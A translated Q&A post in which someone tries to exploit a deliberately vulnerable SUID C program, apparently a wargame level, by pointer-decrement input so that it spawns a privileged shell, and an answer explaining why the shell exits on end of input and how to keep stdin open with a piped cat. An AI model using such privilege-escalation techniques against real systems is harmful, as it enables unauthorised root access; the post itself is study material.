gdb退出而不是生成shell

时间:2015-06-22 05:19:15

标签: c bash shell gdb suid

我正在尝试利用SUID程序。

该计划是:

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>


#define e(); if(((unsigned int)ptr & 0xff000000)==0xca000000) { setresuid(geteuid(), geteuid(), geteuid()); execlp("/bin/sh", "sh", "-i", NULL); }

void print(unsigned char *buf, int len)
{
    int i;
    printf("[ ");
    for(i=0; i < len; i++) printf("%x ", buf[i]); 
    printf(" ]\n");
}

int main()
{
    unsigned char buf[512];
    unsigned char *ptr = buf + (sizeof(buf)/2);
    unsigned int x;

    while((x = getchar()) != EOF) {
            switch(x) {
                    case '\n': print(buf, sizeof(buf)); continue; break;
                    case '\\': ptr--; break; 
                    default: e(); if(ptr > buf + sizeof(buf)) continue; ptr++[0] = x; break;
            }
    }
    printf("All done\n");
}

我们可以很容易地看到,如果我们以某种方式将ptr的内容更改为以CA开头的某个地址,那么将为我们生成一个新的shell。并且由于ptr通常持有一些以FF开头的地址,因此减少它(ptr)的方法是输入\ character。所以我用0x35000000'\'字符创建一个文件,最后在文件末尾创建3'a'

perl -e "print '\\\'x889192448" > file     # decimal equivalent of 0x35000000
echo aaa > file        # So that e() is called which actually spawns the shell

最后在gdb中,

run < file

然而,而不是产生一个shell gdb说

process <some number> is executing new program /bin/dash
inferior 1 exited normally

然后回到gdb提示符而不是获取shell。 我已经通过在适当的位置设置断点来确认,在调用setresuid()之前,ptr确实是从CA开始的。

此外,如果我在gdb之外管道,没有任何反应。

./vulnProg < file

Bash提示返回。

请告诉我我哪里弄错了。

1 个答案:

答案 0 :(得分:3)

您可以通过编译更简单的测试程序来查看问题

int main()  { execlp("/bin/sed", "-e", "s/^/XXX:/", NULL); }

所有这一切都是启动sed版本(而不是shell)并通过前缀“XXX:”来转换输入。

如果您运行生成的程序,并输入终端,您将得到如下行为:

$./a.out 
Hello
XXX:Hello
Test
XXX:Test
^D

这正是我们所期望的。

现在,如果您从包含“Hello \ nWorld”的文件中输入输入,那么

$./a.out < file 
XXX:Hello
XXX:World
$

应用程序立即退出,当输入文件全部被读取时,应用程序的输入流将被关闭。

如果您想提供额外的输入,您需要使用技巧来不破坏输入流。

{ cat file ; cat - ; } | ./a.out

这会将文件中的所有输入放入正在运行的./a.out然后 从stdin读取并添加它。

$ { cat file ; cat - ; } | ./a.out
XXX:Hello
XXX:World
This is a Test
XXX:This is a Test